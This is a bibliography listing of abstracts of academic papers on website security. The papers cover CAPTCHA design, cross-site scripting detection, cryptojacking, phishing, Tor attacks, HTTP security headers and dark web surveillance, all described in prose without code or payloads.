Visible to the public Biblio

Filters: Keyword is Web sites  [Clear All Filters]
Banday, M. T., Sheikh, S. A..  2020.  Improving Security Control of Text-Based CAPTCHA Challenges using Honeypot and Timestamping. 2020 Fourth International Conference on Computing Methodologies and Communication (ICCMC). :704—708.

The resistance to attacks aimed to break CAPTCHA challenges and the effectiveness, efficiency and satisfaction of human users in solving them called usability are the two major concerns while designing CAPTCHA schemes. User-friendliness, universality, and accessibility are related dimensions of usability, which must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations and transformations are added to text-based CAPTCHA challenges resulting in their reduced usability. The extent of these deformations can be decreased if some additional security mechanism is incorporated in such challenges. This paper proposes an additional security mechanism that can add an extra layer of protection to any text-based CAPTCHA challenge, making it more challenging for bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text-boxes for user entry of CAPTCHA string which serves as honeypots for bots and automated scripts. The honeypot technique is used to trick bots and automated scripts into filling up input fields which legitimate human users cannot fill in. The paper reports implementation of honeypot technique and results of tests carried out over three months during which form submissions were logged for analysis. The results demonstrated great effectiveness of honeypots technique to improve security control and usability of text-based CAPTCHA challenges.

Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :653—663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the world wide web. The loaded content is subject to the web security model and considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content which blurs the distinction between the two privilege levels.Getting interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1—6.
Cross-Site Scripting, also called as XSS, is a type of injection where malicious scripts are injected into trusted websites. When malicious code, usually in the form of browser side script, is injected using a web application to a different end user, an XSS attack is said to have taken place. Flaws which allows success to this attack is remarkably widespread and occurs anywhere a web application handles the user input without validating or encoding it. A study carried out by Symantic states that more than 50% of the websites are vulnerable to the XSS attack. Security engineers of Microsoft coined the term "Cross-Site Scripting" in January of the year 2000. But even if was coined in the year 2000, XSS vulnerabilities have been reported and exploited since the beginning of 1990's, whose prey have been all the (then) tech-giants such as Twitter, Myspace, Orkut, Facebook and YouTube. Hence the name "Cross-Site" Scripting. This attack could be combined with other attacks such as phishing attack to make it more lethal but it usually isn't necessary, since it is already extremely difficult to deal with from a user perspective because in many cases it looks very legitimate as it's leveraging attacks against our banks, our shopping websites and not some fake malicious website.
Varlioglu, S., Gonen, B., Ozer, M., Bastug, M..  2020.  Is Cryptojacking Dead After Coinhive Shutdown? 2020 3rd International Conference on Information and Computer Technologies (ICICT). :385—389.
Cryptojacking is the exploitation of victims' computer resources to mine for cryptocurrency using malicious scripts. It had become popular after 2017 when attackers started to exploit legal mining scripts, especially Coinhive scripts. Coinhive was actually a legal mining service that provided scripts and servers for in-browser mining activities. Nevertheless, over 10 million web users had been victims every month before the Coinhive shutdown that happened in Mar 2019. This paper explores the new era of the cryptojacking world after Coinhive discontinued its service. We aimed to see whether and how attackers continue cryptojacking, generate new malicious scripts, and developed new methods. We used a capable cryptojacking detector named CMTracker that proposed by Hong et al. in 2018. We automatically and manually examined 2770 websites that had been detected by CMTracker before the Coinhive shutdown. The results revealed that 99% of sites no longer continue cryptojacking. 1% of websites still run 8 unique mining scripts. By tracking these mining scripts, we detected 632 unique cryptojacking websites. Moreover, open-source investigations (OSINT) demonstrated that attackers still use the same methods. Therefore, we listed the typical patterns of cryptojacking. We concluded that cryptojacking is not dead after the Coinhive shutdown. It is still alive, but not as attractive as it used to be.
Tizio, G. Di, Ngo, C. Nam.  2020.  Are You a Favorite Target For Cryptojacking? A Case-Control Study On The Cryptojacking Ecosystem 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :515—520.
Illicitly hijacking visitors' computational resources for mining cryptocurrency via compromised websites is a consolidated activity.Previous works mainly focused on large-scale analysis of the cryptojacking ecosystem, technical means to detect browser-based mining as well as economic incentives of cryptojacking. So far, no one has studied if certain technical characteristics of a website can increase (decrease) the likelihood of being compromised for cryptojacking campaigns.In this paper, we propose to address this unanswered question by conducting a case-control study with cryptojacking websites obtained crawling the web using Minesweeper. Our preliminary analysis shows some association for certain website characteristics, however, the results obtained are not statistically significant. Thus, more data must be collected and further analysis must be conducted to obtain a better insight into the impact of these relations.
Adil, M., Khan, R., Ghani, M. A. Nawaz Ul.  2020.  Preventive Techniques of Phishing Attacks in Networks. 2020 3rd International Conference on Advancements in Computational Sciences (ICACS). :1—8.

Internet is the most widely used technology in the current era of information technology and it is embedded in daily life activities. Due to its extensive use in everyday life, it has many applications such as social media (Face book, WhatsApp, messenger etc.,) and other online applications such as online businesses, e-counseling, advertisement on websites, e-banking, e-hunting websites, e-doctor appointment and e-doctor opinion. The above mentioned applications of internet technology makes things very easy and accessible for human being in limited time, however, this technology is vulnerable to various security threats. A vital and severe threat associated with this technology or a particular application is “Phishing attack” which is used by attacker to usurp the network security. Phishing attacks includes fake E-mails, fake websites, fake applications which are used to steal their credentials or usurp their security. In this paper, a detailed overview of various phishing attacks, specifically their background knowledge, and solutions proposed in literature to address these issues using various techniques such as anti-phishing, honey pots and firewalls etc. Moreover, installation of intrusion detection systems (IDS) and intrusion detection and prevention system (IPS) in the networks to allow the authentic traffic in an operational network. In this work, we have conducted end use awareness campaign to educate and train the employs in order to minimize the occurrence probability of these attacks. The result analysis observed for this survey was quite excellent by means of its effectiveness to address the aforementioned issues.

Korolev, D., Frolov, A., Babalova, I..  2020.  Classification of Websites Based on the Content and Features of Sites in Onion Space. 2020 IEEE Conference of Russian Young Researchers in Electrical and Electronic Engineering (EIConRus). :1680—1683.
This paper describes a method for classifying onion sites. According to the results of the research, the most spread model of site in onion space is built. To create such a model, a specially trained neural network is used. The classification of neural network is based on five different categories such as using authentication system, corporate email, readable URL, feedback and type of onion-site. The statistics of the most spread types of websites in Dark Net are given.
Ge, K., He, Y..  2020.  Detection of Sybil Attack on Tor Resource Distribution. 2020 IEEE International Conference on Power, Intelligent Computing and Systems (ICPICS). :328–332.
Tor anonymous communication system's resource publishing is vulnerable to enumeration attacks. Zhao determines users who requested resources are unavailable as suspicious malicious users, and gradually reduce the scope of suspicious users through several stages to reduce the false positive rate. However, it takes several stages to distinguish users. Although this method successfully detects the malicious user, the malicious user has acquired many resources in the previous stages, which reduce the availability of the anonymous communication system. This paper proposes a detection method based on Integer Linear Program to detect malicious users who perform enumeration attacks on resources in the process of resource distribution. First, we need construct a bipartite graph between the unavailable resources and the users who requested for these resources in the anonymous communication system; next we use Integer Linear Program to find the minimum malicious user set. We simulate the resource distribution process through computer program, we perform an experimental analysis of the method in this paper is carried out. Experimental results show that the accuracy of the method in this paper is above 80%, when the unavailable resources in the system account for no more than 50%. It is about 10% higher than Zhao's method.
Habibi, G., Surantha, N..  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack most often carried out by attackers to attack a website by inserting malicious scripts into a website. This attack will take the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors conducted a study by evaluating several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). The machine learning algorithm is then equipped with the n-gram method to each script feature to improve the detection performance of XSS attacks. The simulation results show that the SVM and n-gram method achieves the highest accuracy with 98%.

Haddad, G. El, Aïmeur, E., Hage, H..  2018.  Understanding Trust, Privacy and Financial Fears in Online Payment. 2018 17th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/ 12th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :28–36.
In online payment, customers must transmit their personal and financial information through the website to conclude their purchase and pay the services or items selected. They may face possible fears from online transactions raised by their risk perception about financial or privacy loss. They may have concerns over the payment decision with the possible negative behaviors such as shopping cart abandonment. Therefore, customers have three major players that need to be addressed in online payment: the online seller, the payment page, and their own perception. However, few studies have explored these three players in an online purchasing environment. In this paper, we focus on the customer concerns and examine the antecedents of trust, payment security perception as well as their joint effect on two fundamentally important customers' aspects privacy concerns and financial fear perception. A total of 392 individuals participated in an online survey. The results highlight the importance, of the seller website's components (such as ease of use, security signs, and quality information) and their impact on the perceived payment security as well as their impact on customer's trust and financial fear perception. The objective of our study is to design a research model that explains the factors contributing to an online payment decision.
Lavrenovs, A., Melón, F. J. R..  2018.  HTTP security headers analysis of top one million websites. 2018 10th International Conference on Cyber Conflict (CyCon). :345—370.
We present research on the security of the most popular websites, ranked according to Alexa's top one million list, based on an HTTP response headers analysis. For each of the domains included in the list, we made four different requests: an HTTP/1.1 request to the domain itself and to its "www" subdomain and two more equivalent HTTPS requests. Redirections were always followed. A detailed discussion of the request process and main outcomes is presented, including X.509 certificate issues and comparison of results with equivalent HTTP/2 requests. The body of the responses was discarded, and the HTTP response header fields were stored in a database. We analysed the prevalence of the most important response headers related to web security aspects. In particular, we took into account Strict- Transport-Security, Content-Security-Policy, X-XSS-Protection, X-Frame-Options, Set-Cookie (for session cookies) and X-Content-Type. We also reviewed the contents of response HTTP headers that potentially could reveal unwanted information, like Server (and related headers), Date and Referrer-Policy. This research offers an up-to-date survey of current prevalence of web security policies implemented through HTTP response headers and concludes that most popular sites tend to implement it noticeably more often than less popular ones. Equally, HTTPS sites seem to be far more eager to implement those policies than HTTP only websites. A comparison with previous works show that web security policies based on HTTP response headers are continuously growing, but still far from satisfactory widespread adoption.
Khurana, N., Mittal, S., Piplai, A., Joshi, A..  2019.  Preventing Poisoning Attacks On AI Based Threat Intelligence Systems. 2019 IEEE 29th International Workshop on Machine Learning for Signal Processing (MLSP). :1—6.

As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent and use this information. The credibility of this information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources; and in certain situations, pose a threat to human life. In this paper, we use an ensembled semi-supervised approach to determine the credibility of Reddit posts by estimating their reputation score to ensure the validity of information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts utilize these systems to determine possible threats by analyzing the data scattered on social media websites, forums, blogs, etc.

Gaio Rito, Cátia Sofia, Beatriz Piedade, Maria, Eugénio Lucas, Eugénio.  2019.  E-Government - Qualified Digital Signature Case Study. 2019 14th Iberian Conference on Information Systems and Technologies (CISTI). :1—6.

This paper presents a case study on the use and implementation of the Qualified Digital Signature. Problematics such as the degree of use, security and authenticity of Qualified Digital Signature and the publication and dissemination of documents signed in digital format are analyzed. In order to support the case study, a methodology was adopted that included interviews with municipalities that are part of the Intermunicipal Community of the region of Leiria and a computer application was developed that allowed to analyze the documents available in the institutional websites of the municipalities, the ones that were digitally signed. The results show that institutional websites are already providing documentation with Qualified Digital Signature and that the level of trust and authenticity regarding their use is considered to be mostly very positive.

Shayganmehr, Masoud, Montazer, Gholam Ali.  2019.  Identifying Indexes Affecting the Quality of E-Government Websites. 2019 5th International Conference on Web Research (ICWR). :167—171.

With the development of new technologies in the world, governments have tendency to make a communications with people and business with the help of such technologies. Electronic government (e-government) is defined as utilizing information technologies such as electronic networks, Internet and mobile phones by organizations and state institutions in order to making wide communication between citizens, business and different state institutions. Development of e-government starts with making website in order to share information with users and is considered as the main infrastructure for further development. Website assessment is considered as a way for improving service quality. Different international researches have introduced various indexes for website assessment, they only see some dimensions of website in their research. In this paper, the most important indexes for website quality assessment based on accurate review of previous studies are "Web design", "navigation", services", "maintenance and Support", "Citizens Participation", "Information Quality", "Privacy and Security", "Responsiveness", "Usability". Considering mentioned indexes in designing the website facilitates user interaction with the e-government websites.

Lv, Chengcheng, Zhang, Long, Zeng, Fanping, Zhang, Jian.  2019.  Adaptive Random Testing for XSS Vulnerability. 2019 26th Asia-Pacific Software Engineering Conference (APSEC). :63–69.
XSS is one of the common vulnerabilities in web applications. Many black-box testing tools may collect a large number of payloads and traverse them to find a payload that can be successfully injected, but they are not very efficient. And previous research has paid less attention to how to improve the efficiency of black-box testing to detect XSS vulnerability. To improve the efficiency of testing, we develop an XSS testing tool. It collects 6128 payloads and uses a headless browser to detect XSS vulnerability. The tool can discover XSS vulnerability quickly with the ART(Adaptive Random Testing) method. We conduct an experiment using 3 extensively adopted open source vulnerable benchmarks and 2 actual websites to evaluate the ART method. The experimental results indicate that the ART method can effectively improve the fuzzing method by more than 27.1% in reducing the number of attempts before accomplishing a successful injection.
Mohammadi, Mahmoud, Chu, Bill, Richter Lipford, Heather.  2019.  Automated Repair of Cross-Site Scripting Vulnerabilities through Unit Testing. 2019 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW). :370–377.
Many web applications are vulnerable to Cross Site Scripting (XSS) attacks enabling attackers to steal sensitive information and commit frauds. Much research in this area have focused on detecting vulnerable web pages using static and dynamic program analysis. The best practice to prevent XSS vulnerabilities is to encode untrusted dynamic content. However, a common programming error is the use of a wrong type of encoder to sanitize untrusted data, leaving the application vulnerable. We propose a new approach that can automatically fix this common type of XSS vulnerability in many situations. This approach is integrated into the software maintenance life cycle through unit testing. Vulnerable codes are refactored to reflect the suggested encoder and then verified using an attack evaluating mechanism to find a proper repair. Evaluation of this approach has been conducted on an open source medical record application with over 200 web pages written in JSP.
Shekhar, Heemany, Moh, Melody, Moh, Teng-Sheng.  2019.  Exploring Adversaries to Defend Audio CAPTCHA. 2019 18th IEEE International Conference On Machine Learning And Applications (ICMLA). :1155—1161.
CAPTCHA is a web-based authentication method used by websites to distinguish between humans (valid users) and bots (attackers). Audio captcha is an accessible captcha meant for the visually disabled section of users such as color-blind, blind, near-sighted users. Firstly, this paper analyzes how secure current audio captchas are from attacks using machine learning (ML) and deep learning (DL) models. Each audio captcha is made up of five, seven or ten random digits[0-9] spoken one after the other along with varying background noise throughout the length of the audio. If the ML or DL model is able to correctly identify all spoken digits and in the correct order of occurance in a single audio captcha, we consider that captcha to be broken and the attack to be successful. Throughout the paper, accuracy refers to the attack model's success at breaking audio captchas. The higher the attack accuracy, the more unsecure the audio captchas are. In our baseline experiments, we found that attack models could break audio captchas that had no background noise or medium background noise with any number of spoken digits with nearly 99% to 100% accuracy. Whereas, audio captchas with high background noise were relatively more secure with attack accuracy of 85%. Secondly, we propose that the concepts of adversarial examples algorithms can be used to create a new kind of audio captcha that is more resilient towards attacks. We found that even after retraining the models on the new adversarial audio data, the attack accuracy remained as low as 25% to 36% only. Lastly, we explore the benefits of creating adversarial audio captcha through different algorithms such as Basic Iterative Method (BIM) and deepFool. We found that as long as the attacker has less than 45% sample from each kinds of adversarial audio datasets, the defense will be successful at preventing attacks.
Moe, Khin Su Myat, Win, Thanda.  2018.  Enhanced Honey Encryption Algorithm for Increasing Message Space against Brute Force Attack. 2018 15th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :86—89.
In the era of digitization, data security is a vital role in message transmission and all systems that deal with users require stronger encryption techniques that against brute force attack. Honey encryption (HE) algorithm is a user data protection algorithm that can deceive the attackers from unauthorized access to user, database and websites. The main part of conventional HE is distribution transforming encoder (DTE). However, the current DTE process using cumulative distribution function (CDF) has the weakness in message space limitation because CDF cannot solve the probability theory in more than four messages. So, we propose a new method in DTE process using discrete distribution function in order to solve message space limitation problem. In our proposed honeywords generation method, the current weakness of existing honeywords generation method such as storage overhead problem can be solved. In this paper, we also describe the case studies calculation of DTE in order to prove that new DTE process has no message space limitation and mathematical model using discrete distribution function for DTE process facilitates the distribution probability theory.
Agrawal, Shriyansh, Sanagavarapu, Lalit Mohan, Reddy, YR.  2019.  FACT - Fine grained Assessment of web page CredibiliTy. TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). :1088–1097.
With more than a trillion web pages, there is a plethora of content available for consumption. Search Engine queries invariably lead to overwhelming information, parts of it relevant and some others irrelevant. Often the information provided can be conflicting, ambiguous, and inconsistent contributing to the loss of credibility of the content. In the past, researchers have proposed approaches for credibility assessment and enumerated factors influencing the credibility of web pages. In this work, we detailed a WEBCred framework for automated genre-aware credibility assessment of web pages. We developed a tool based on the proposed framework to extract web page features instances and identify genre a web page belongs to while assessing it's Genre Credibility Score ( GCS). We validated our approach on `Information Security' dataset of 8,550 URLs with 171 features across 7 genres. The supervised learning algorithm, Gradient Boosted Decision Tree classified genres with 88.75% testing accuracy over 10 fold cross-validation, an improvement over the current benchmark. We also examined our approach on `Health' domain web pages and had comparable results. The calculated GCS correlated 69% with crowdsourced Web Of Trust ( WOT) score and 13% with algorithm based Alexa ranking across 5 Information security groups. This variance in correlation states that our GCS approach aligns with human way ( WOT) as compared to algorithmic way (Alexa) of web assessment in both the experiments.
Yulianto, Arief Dwi, Sukarno, Parman, Warrdana, Aulia Arif, Makky, Muhammad Al.  2019.  Mitigation of Cryptojacking Attacks Using Taint Analysis. 2019 4th International Conference on Information Technology, Information Systems and Electrical Engineering (ICITISEE). :234—238.

Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model using CPU resources covertly “mining” a cryptocurrency in the browser. The impact is a surge in CPU Usage and slows the system performance. In this research, in-browsercryptojacking mitigation has been built as an extension in Google Chrome using Taint analysis method. The method used in this research is attack modeling with abuse case using the Man-In-The-Middle (MITM) attack as a testing for mitigation. The proposed model is designed so that users will be notified if a cryptojacking attack occurs. Hence, the user is able to check the script characteristics that run on the website background. The results of this research show that the taint analysis is a promising method to mitigate cryptojacking attacks. From 100 random sample websites, the taint analysis method can detect 19 websites that are infcted by cryptojacking.

Tahir, Rashid, Durrani, Sultan, Ahmed, Faizan, Saeed, Hammas, Zaffar, Fareed, Ilyas, Saqib.  2019.  The Browsers Strike Back: Countering Cryptojacking and Parasitic Miners on the Web. IEEE INFOCOM 2019 - IEEE Conference on Computer Communications. :703—711.

With the recent boom in the cryptocurrency market, hackers have been on the lookout to find novel ways of commandeering users' machine for covert and stealthy mining operations. In an attempt to expose such under-the-hood practices, this paper explores the issue of browser cryptojacking, whereby miners are secretly deployed inside browser code without the knowledge of the user. To this end, we analyze the top 50k websites from Alexa and find a noticeable percentage of sites that are indulging in this exploitative exercise often using heavily obfuscated code. Furthermore, mining prevention plug-ins, such as NoMiner, fail to flag such cleverly concealed instances. Hence, we propose a machine learning solution based on hardware-assisted profiling of browser code in real-time. A fine-grained micro-architectural footprint allows us to classify mining applications with \textbackslashtextgreater99% accuracy and even flags them if the mining code has been heavily obfuscated or encrypted. We build our own browser extension and show that it outperforms other plug-ins. The proposed design has negligible overhead on the user's machine and works for all standard off-the-shelf CPUs.

Saad, Muhammad, Khormali, Aminollah, Mohaisen, Aziz.  2019.  Dine and Dash: Static, Dynamic, and Economic Analysis of In-Browser Cryptojacking. 2019 APWG Symposium on Electronic Crime Research (eCrime). :1—12.

Cryptojacking is the permissionless use of a target device to covertly mine cryptocurrencies. With cryptojacking attackers use malicious JavaScript codes to force web browsers into solving proof-of-work puzzles, thus making money by exploiting resources of the website visitors. To understand and counter such attacks, we systematically analyze the static, dynamic, and economic aspects of in-browser cryptojacking. For static analysis, we perform content-, currency-, and code-based categorization of cryptojacking samples to 1) measure their distribution across websites, 2) highlight their platform affinities, and 3) study their code complexities. We apply unsupervised learning to distinguish cryptojacking scripts from benign and other malicious JavaScript samples with 96.4% accuracy. For dynamic analysis, we analyze the effect of cryptojacking on critical system resources, such as CPU and battery usage. Additionally, we perform web browser fingerprinting to analyze the information exchange between the victim node and the dropzone cryptojacking server. We also build an analytical model to empirically evaluate the feasibility of cryptojacking as an alternative to online advertisement. Our results show a large negative profit and loss gap, indicating that the model is economically impractical. Finally, by leveraging insights from our analyses, we build countermeasures for in-browser cryptojacking that improve upon the existing remedies.

Godawatte, Kithmini, Raza, Mansoor, Murtaza, Mohsin, Saeed, Ather.  2019.  Dark Web Along With The Dark Web Marketing And Surveillance. 2019 20th International Conference on Parallel and Distributed Computing, Applications and Technologies (PDCAT). :483—485.

Cybercrimes and cyber criminals widely use dark web and illegal functionalities of the dark web towards the world crisis. More than half of the criminal activities and the terror activities conducted through the dark web such as, cryptocurrency, selling human organs, red rooms, child pornography, arm deals, drug deals, hire assassins and hackers, hacking software and malware programs, etc. The law enforcement agencies such as FBI, NSA, Interpol, Mossad, FSB etc, are always conducting surveillance programs through the dark web to trace down the mass criminals and terrorists while stopping the crimes and the terror activities. This paper is about the dark web marketing and surveillance programs. In the deep end research will discuss the dark web access with securely and how the law enforcement agencies exponentially tracking down the users with terror behaviours and activities. Moreover, the paper discusses dark web sites which users can grab the dark web jihadist services and anonymous markets including safety precautions.

Attarian, Reyhane, Hashemi, Sattar.  2019.  Investigating the Streaming Algorithms Usage in Website Fingerprinting Attack Against Tor Privacy Enhancing Technology. 2019 16th International ISC (Iranian Society of Cryptology) Conference on Information Security and Cryptology (ISCISC). :33–38.
Website fingerprinting attack is a kind of traffic analysis attack that aims to identify the URL of visited websites using the Tor browser. Previous website fingerprinting attacks were based on batch learning methods which assumed that the traffic traces of each website are independent and generated from the stationary probability distribution. But, in realistic scenarios, the websites' concepts can change over time (dynamic websites) that is known as concept drift. To deal with data whose distribution change over time, the classifier model must update its model permanently and be adaptive to concept drift. Streaming algorithms are dynamic models that have these features and lead us to make a comparison of various representative data stream classification algorithms for website fingerprinting. Given to our experiments and results, by considering streaming algorithms along with statistical flow-based network traffic features, the accuracy grows significantly.
Balouchestani, Arian, Mahdavi, Mojtaba, Hallaj, Yeganeh, Javdani, Delaram.  2019.  SANUB: A new method for Sharing and Analyzing News Using Blockchain. 2019 16th International ISC (Iranian Society of Cryptology) Conference on Information Security and Cryptology (ISCISC). :139–143.
Millions of news are being exchanged daily among people. With the appearance of the Internet, the way of broadcasting news has changed and become faster, however it caused many problems. For instance, the increase in the speed of broadcasting news leads to an increase in the speed of fake news creation. Fake news can have a huge impression on societies. Additionally, the existence of a central entity, such as news agencies, could lead to fraud in the news broadcasting process, e.g. generating fake news and publishing them for their benefits. Since Blockchain technology provides a reliable decentralized network, it can be used to publish news. In addition, Blockchain with the help of decentralized applications and smart contracts can provide a platform in which fake news can be detected through public participation. In this paper, we proposed a new method for sharing and analyzing news to detect fake news using Blockchain, called SANUB. SANUB provides features such as publishing news anonymously, news evaluation, reporter validation, fake news detection and proof of news ownership. The results of our analysis show that SANUB outperformed the existing methods.